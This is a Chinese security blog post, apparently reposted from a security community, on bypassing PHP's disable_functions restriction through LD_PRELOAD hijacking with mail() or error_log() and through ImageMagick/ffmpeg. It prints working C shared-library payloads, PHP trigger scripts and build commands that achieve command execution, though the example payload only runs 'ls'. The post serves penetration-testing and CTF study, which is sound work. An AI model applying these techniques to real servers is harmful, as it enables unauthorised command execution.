<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
    

    

    



    <meta charset="utf-8">
    
    
    
    
    <title>Bypass-disabled_functions一些思路总结 | 七友 | 路漫漫其修远兮，吾将上下而求索</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#3F51B5">
    
    
    <meta name="keywords" content="一些姿势">
    <meta name="description" content="文章首发于先知社区https://xz.aliyun.com/t/4623  简介PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 Bypass思路利用LD_PRELOAD什么是LD_PRELOAD1LD_PRELOAD是Linux系统的一个环境变量，用于动态库的加载，动态库加载的优先级最高，它可以影响程序的运行时的链接（Runtime linke">
<meta name="keywords" content="一些姿势">
<meta property="og:type" content="article">
<meta property="og:title" content="Bypass-disabled_functions一些思路总结">
<meta property="og:url" content="https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/index.html">
<meta property="og:site_name" content="七友">
<meta property="og:description" content="文章首发于先知社区https://xz.aliyun.com/t/4623  简介PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 Bypass思路利用LD_PRELOAD什么是LD_PRELOAD1LD_PRELOAD是Linux系统的一个环境变量，用于动态库的加载，动态库加载的优先级最高，它可以影响程序的运行时的链接（Runtime linke">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330005303-1e7ffcda-5243-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330011754-96d9fcb4-5246-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330023106-d0f82628-5250-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330013011-4deed608-5248-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330030422-76438ea2-5255-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330025044-8eb6eefe-5253-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330030223-2f5a5796-5255-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330030310-4b46e942-5255-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330090346-ab7e1f1a-5287-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330121909-f6e6dfbc-52a2-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330122537-de3708b0-52a3-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330122857-55adcbd6-52a4-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330123601-52125e32-52a5-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330131614-f0c0b768-52aa-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330100258-f0e06182-528f-1.png">
<meta property="og:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330134911-8ad0aa9e-52af-1.png">
<meta property="og:updated_time" content="2019-05-14T16:29:14.999Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Bypass-disabled_functions一些思路总结">
<meta name="twitter:description" content="文章首发于先知社区https://xz.aliyun.com/t/4623  简介PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 Bypass思路利用LD_PRELOAD什么是LD_PRELOAD1LD_PRELOAD是Linux系统的一个环境变量，用于动态库的加载，动态库加载的优先级最高，它可以影响程序的运行时的链接（Runtime linke">
<meta name="twitter:image" content="https://xzfile.aliyuncs.com/media/upload/picture/20190330005303-1e7ffcda-5243-1.png">
    
    <link rel="shortcut icon" href="/favicon.ico">
    <link rel="stylesheet" href="//unpkg.com/hexo-theme-material-indigo@latest/css/style.css">
    <script>window.lazyScripts=[]</script>

    <!-- custom head -->
    

<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body>
    <div id="loading" class="active"></div>

    <aside id="menu" class="hide" >
  <div class="inner flex-row-vertical">
    <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menu-off">
        <i class="icon icon-lg icon-close"></i>
    </a>
    <div class="brand-wrap" style="background-image:url(/img/brand.jpg)">
      <div class="brand">
        <a href="/" class="avatar waves-effect waves-circle waves-light">
          <img src="/img/avatar.jpg">
        </a>
        <hgroup class="introduce">
          <h5 class="nickname"></h5>
          <a href="mailto:1920854803@qq.com" title="1920854803@qq.com" class="mail">1920854803@qq.com</a>
        </hgroup>
      </div>
    </div>
    <div class="scroll-wrap flex-col">
      <ul class="nav">
        
            <li class="waves-block waves-effect">
              <a href="/"  >
                <i class="icon icon-lg icon-home"></i>
                主页
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/archives"  >
                <i class="icon icon-lg icon-archives"></i>
                Archives
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/tags"  >
                <i class="icon icon-lg icon-tags"></i>
                Tags
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/categories"  >
                <i class="icon icon-lg icon-th-list"></i>
                Categories
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="https://github.com/byqiyou" target="_blank" >
                <i class="icon icon-lg icon-github"></i>
                Github
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/friends"  >
                <i class="icon icon-lg icon-friends"></i>
                Friends
              </a>
            </li>
        
            <li class="waves-block waves-effect">
              <a href="/about"  >
                <i class="icon icon-lg icon-about"></i>
                About
              </a>
            </li>
        
      </ul>
    </div>
  </div>
</aside>

    <main id="main">
        <header class="top-header" id="header">
    <div class="flex-row">
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light on" id="menu-toggle">
          <i class="icon icon-lg icon-navicon"></i>
        </a>
        <div class="flex-col header-title ellipsis">Bypass-disabled_functions一些思路总结</div>
        
        <div class="search-wrap" id="search-wrap">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="back">
                <i class="icon icon-lg icon-chevron-left"></i>
            </a>
            <input type="text" id="key" class="search-input" autocomplete="off" placeholder="输入感兴趣的关键字">
            <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="search">
                <i class="icon icon-lg icon-search"></i>
            </a>
        </div>
        
        
        <a href="javascript:;" class="header-icon waves-effect waves-circle waves-light" id="menuShare">
            <i class="icon icon-lg icon-share-alt"></i>
        </a>
        
    </div>
</header>
<header class="content-header post-header">

    <div class="container fade-scale">
        <h1 class="title">Bypass-disabled_functions一些思路总结</h1>
        <h5 class="subtitle">
            
                <time datetime="2019-04-04T02:17:41.000Z" itemprop="datePublished" class="page-time">
  2019-04-04
</time>


            
        </h5>
    </div>

    


</header>


<div class="container body-wrap">
    
    <aside class="post-widget">
        <nav class="post-toc-wrap post-toc-shrink" id="post-toc">
            <h4>TOC</h4>
            <ol class="post-toc"><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#简介"><span class="post-toc-number">1.</span> <span class="post-toc-text">简介</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Bypass思路"><span class="post-toc-number">2.</span> <span class="post-toc-text">Bypass思路</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用LD-PRELOAD"><span class="post-toc-number">2.1.</span> <span class="post-toc-text">利用LD_PRELOAD</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#demo"><span class="post-toc-number">2.1.1.</span> <span class="post-toc-text">demo</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#配合putenv-mail"><span class="post-toc-number">2.1.2.</span> <span class="post-toc-text">配合putenv+mail</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#配合putenv-error-log"><span class="post-toc-number">2.1.3.</span> <span class="post-toc-text">配合putenv+error_log</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用ImageMagick"><span class="post-toc-number">2.2.</span> <span class="post-toc-text">利用ImageMagick</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#环境搭建"><span class="post-toc-number">2.2.1.</span> <span class="post-toc-text">环境搭建</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#如何利用"><span class="post-toc-number">2.2.2.</span> <span class="post-toc-text">如何利用</span></a></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#配合-attribute-函数"><span class="post-toc-number">2.2.3.</span> <span class="post-toc-text">配合__attribute__函数</span></a></li></ol></li><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#利用imap-open-CVE-2018-19518"><span class="post-toc-number">2.3.</span> <span class="post-toc-text">利用imap_open (CVE-2018-19518)</span></a></li></ol></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#后记"><span class="post-toc-number">3.</span> <span class="post-toc-text">后记</span></a></li><li class="post-toc-item post-toc-level-1"><a class="post-toc-link" href="#Reference"><span class="post-toc-number">4.</span> <span class="post-toc-text">Reference</span></a></li></ol>
        </nav>
    </aside>


<article id="post-Bypass-disabled-functions一些思路总结"
  class="post-article article-type-post fade" itemprop="blogPost">

    <div class="post-card">
        <h1 class="post-card-title">Bypass-disabled_functions一些思路总结</h1>
        <div class="post-meta">
            <time class="post-time" title="2019-04-04 10:17:41" datetime="2019-04-04T02:17:41.000Z"  itemprop="datePublished">2019-04-04</time>

            


            
<span id="busuanzi_container_page_pv" title="文章总阅读量" style='display:none'>
    <i class="icon icon-eye icon-pr"></i><span id="busuanzi_value_page_pv"></span>
</span>


        </div>
        <div class="post-content" id="post-content" itemprop="postContent">
            <blockquote>
<p>文章首发于先知社区<a href="https://xz.aliyun.com/t/4623" target="_blank" rel="noopener">https://xz.aliyun.com/t/4623</a></p>
</blockquote>
<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用</p>
<h1 id="Bypass思路"><a href="#Bypass思路" class="headerlink" title="Bypass思路"></a>Bypass思路</h1><h2 id="利用LD-PRELOAD"><a href="#利用LD-PRELOAD" class="headerlink" title="利用LD_PRELOAD"></a>利用LD_PRELOAD</h2><p>什么是LD_PRELOAD<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">LD_PRELOAD是Linux系统的一个环境变量，用于动态库的加载，动态库加载的优先级最高，它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码），而另一方面，我们也可以以向别人的程序注入程序，从而达到特定的目的。</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>简单来说就是<code>LD_PRELOAD</code>指定的动态链接库文件，会在其它文件调用之前先被调用</p>
<h3 id="demo"><a href="#demo" class="headerlink" title="demo"></a>demo</h3><p>光看概念估计你可能会很懵，我们来写一个简单的demo来了解一下啥是<code>LD_PRELOAD</code><br>首先我们先写一个id.c，内容如下：<br></p><figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;dlfcn.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">uid_t</span> geteuid( <span class="keyword">void</span> ) { <span class="keyword">return</span> <span class="number">0</span>; }</span><br><span class="line"><span class="keyword">uid_t</span> getuid( <span class="keyword">void</span> ) { <span class="keyword">return</span> <span class="number">0</span>; }</span><br><span class="line"><span class="keyword">uid_t</span> getgid( <span class="keyword">void</span> ) { <span class="keyword">return</span> <span class="number">0</span>; }</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>执行一波<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">qiyou@ubuntu:~/Desktop$ id</span><br><span class="line">uid=1000(qiyou) gid=1000(qiyou) groups=1000(qiyou)....</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~$ whoami</span><br><span class="line">qiyou</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~/Desktop$ gcc -shared -o id.so id.c</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~/Desktop$ export LD_PRELOAD=./id.so</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~/Desktop$ id</span><br><span class="line">uid=0(root) gid=0(root) egid=1000(qiyou)....</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~/Desktop$ whoami</span><br><span class="line">root</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>可以看到uid和gid都变为了0，权限也变为了root</p>
<p>我们可以用ldd查询一下依赖关系，可以发现id.so(我们编译的动态链接库)在其它动态链接库之前提前被加载了，也就是说我们的恶意代码中的函数覆盖了原本的动态链接库的函数</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330005303-1e7ffcda-5243-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h3 id="配合putenv-mail"><a href="#配合putenv-mail" class="headerlink" title="配合putenv+mail"></a>配合putenv+mail</h3><p>putenv官方手册是这么解释的：<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">putenv ( string $setting ) : bool</span><br><span class="line">添加setting到服务器环境。环境变量仅在当前请求的持续时间内存在。在请求结束时，环境将恢复到其原始状态。</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>如果该函数未被ban掉的话，即使是禁用了其它常见的函数，也可能会导致rce<br>我们可以按照如下步骤：</p>
<ol>
<li>生成一个我们的恶意动态链接库文件</li>
<li>利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径</li>
<li>配合php的某个函数去触发我们的恶意动态链接库文件</li>
<li>Getshell</li>
</ol>
<p>那么php中的某个函数怎么去找呢，参考了<a href="https://www.tr0y.wang/2018/04/18/PHPDisalbedfunc/index.html" title="该文章" target="_blank" rel="noopener">该文章</a>，发现mail()函数可以使用，而mail()函数执行默认是会调用外部程序sendmail的，看一下php.ini就会发现默认调用<code>sendmail -t -i</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330011754-96d9fcb4-5246-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<blockquote>
<p>PS：如果没有安装sendmail的话可以用<code>apt-get install sendmail</code>安装sendmail</p>
</blockquote>
<p>我们可以用strace查看一下mail函数调用的过程，可以很明显看出来执行了<code>sendmail -t -i</code><br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330023106-d0f82628-5250-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p>然后我们可以使用 <code>readelf -Ws /usr/sbin/sendmail</code> 可以查看senmail都调用了哪一些函数，然后从中选几个即可，这里我们选择<code>getuid</code></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330013011-4deed608-5248-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>然后就可以编写我们的动态连接程序<br>test.c<br></p><figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">payload</span><span class="params">()</span> </span>{</span><br><span class="line">        system(<span class="string">"ls &gt; test"</span>);</span><br><span class="line">}   </span><br><span class="line"><span class="function"><span class="keyword">int</span>  <span class="title">geteuid</span><span class="params">()</span> </span>{</span><br><span class="line"><span class="keyword">if</span> (getenv(<span class="string">"LD_PRELOAD"</span>) == <span class="literal">NULL</span>) { <span class="keyword">return</span> <span class="number">0</span>; }</span><br><span class="line">unsetenv(<span class="string">"LD_PRELOAD"</span>);</span><br><span class="line">payload();</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后生成我们的动态链接程序<br></p><figure class="highlight sh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -c -fPIC test.c -o <span class="built_in">test</span></span><br><span class="line">gcc --share <span class="built_in">test</span> -o test.so</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>然后编写php脚本mail.php<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">putenv(<span class="string">"LD_PRELOAD=./test.so"</span>);</span><br><span class="line">mail(<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>,<span class="string">""</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>执行一波，然后用strace查看调用过程是否执行了我们的<code>ls &gt; test</code>，可以发现成执行了我们的命令</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330030422-76438ea2-5255-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330025044-8eb6eefe-5253-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h3 id="配合putenv-error-log"><a href="#配合putenv-error-log" class="headerlink" title="配合putenv+error_log"></a>配合putenv+error_log</h3><p>0ctf2019的<code>Wallbreaker Easy</code>中ban了mail函数，但是<code>error_log</code>没有ban掉，故我们可以用<code>error_log</code>来bypass disabled_functions</p>
<p>error_log的一些参数<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">error_log(error,type,destination,headers)</span><br><span class="line"></span><br><span class="line">当type为1时，服务器就会把error发送到参数 destination 设置的邮件地址</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>编写php脚本，动态链接文件同上，error_log调用的过程中（当type为1时）和mail函数一样，也会调用sendmail，<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">putenv(<span class="string">"LD_PRELOAD=./test.so"</span>);</span><br><span class="line">error_log(<span class="string">"test"</span>,<span class="number">1</span>,<span class="string">""</span>,<span class="string">""</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330030223-2f5a5796-5255-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330030310-4b46e942-5255-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330090346-ab7e1f1a-5287-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h2 id="利用ImageMagick"><a href="#利用ImageMagick" class="headerlink" title="利用ImageMagick"></a>利用ImageMagick</h2><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p>这个搭建环境有一丝丝繁琐，不过没关系，按照我以下步骤来应该问题不大QAQ<br></p><figure class="highlight sh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1：apt-get update&amp;&amp;apt-get install imagemagick</span><br><span class="line">2：convert -version //如果安装成功会返回imagemagick版本号</span><br></pre></td></tr></tbody></table></figure><p></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330121909-f6e6dfbc-52a2-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>安装几个依赖<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-get install php-pear php-dev</span><br><span class="line">apt-get install libmagickwand-dev</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>下载以及安装imagick<br></p><figure class="highlight sh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">1.wget http://pecl.php.net/get/imagick-3.4.3.tgz</span><br><span class="line"></span><br><span class="line">2.tar -zxvf imagick-3.4.3.tgz</span><br><span class="line"></span><br><span class="line">3.phpize</span><br><span class="line"></span><br><span class="line">4.  ./configure --with-php-config=/usr/bin/php-config --with-imagick=/usr/<span class="built_in">local</span>/imagemagick //注意php-config可能会不同，要根据你具体的情况来修改</span><br><span class="line"></span><br><span class="line">5.make&amp;&amp;make install</span><br><span class="line"></span><br><span class="line">6.改一波php.ini，随便一行添加：extension = imagick.so</span><br><span class="line"></span><br><span class="line">7.然后php -r <span class="string">"phpinfo();"</span>|grep imagick，看有没有安装成功</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>成功安装<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330122537-de3708b0-52a3-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<p>然后安装ffmpeg<br></p><figure class="highlight sh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">apt-get install ffmpeg</span><br><span class="line">ffmpeg -v 看看是否安装成功</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>成功安装<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330122857-55adcbd6-52a4-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<h3 id="如何利用"><a href="#如何利用" class="headerlink" title="如何利用"></a>如何利用</h3><p>那么我们应该如何利用呢，参考了飘零师傅的分析，可以知道当Imagick处理的文件是如下后缀的时候，就会调用外部程序ffmpeg去处理该文件<br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmv,mov,m4v,m2v,mp4,mpg,mpeg,mkv,avi,3g2,3gp</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>我们来写一个小demo来验证一下是否正确<br>img.php<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$img = <span class="keyword">new</span> Imagick(<span class="string">'img.mp4'</span>); <span class="comment">//img.mp4文件必须存在，否则就会不去调用ffmpeg</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>我们strace一下看看执行的过程，可以发现在执行的过程中调用了ffmpeg</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330123601-52125e32-52a5-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h3 id="配合-attribute-函数"><a href="#配合-attribute-函数" class="headerlink" title="配合__attribute__函数"></a>配合<code>__attribute__</code>函数</h3><p><strong> PS: <code>__attribute__</code>的介绍</strong><br></p><figure class="highlight plain"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">__attribute__可以设置函数属性(Function Attribute)、变量属性(Variable Attribute)和类型属性(Type Attribute)。__attribute__前后都有两个下划线，并且后面会紧跟一对原括弧，括弧里面是相应的__attribute__参数</span><br><span class="line"></span><br><span class="line">__attribute__语法格式为：__attribute__ ( ( attribute-list ) )</span><br><span class="line">若函数被设定为constructor属性，则该函数会在main（）函数执行之前被自动的执行。类似的，若函数被设定为destructor属性，则该函数会在main（）函数执行之后或者exit（）被调用后被自动的执行。例如下面的程序：</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>我们可以知道当该函数为<code>__attribute__((__constructor__))</code>的时候，会在main（）函数执行之前被自动的执行<br>所以我们尝试构造poc.c</p>
<figure class="highlight c"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"></span><br><span class="line">__attribute__ ((__constructor__)) <span class="function"><span class="keyword">void</span> <span class="title">angel</span> <span class="params">(<span class="keyword">void</span>)</span></span>{</span><br><span class="line">    unsetenv(<span class="string">"LD_PRELOAD"</span>);</span><br><span class="line">    system(<span class="string">"ls &gt; test"</span>);</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>然后生成我们的动态链接程序<br></p><figure class="highlight sh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gcc -c -fPIC poc.c -o poc</span><br><span class="line">gcc --share poc -o poc.so</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>img.php<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">putenv(<span class="string">"LD_PRELOAD=./poc.so"</span>);</span><br><span class="line">$img = <span class="keyword">new</span> Imagick(<span class="string">'img.mp4'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>运行一波，发现我们的命令执行成功了<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330131614-f0c0b768-52aa-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
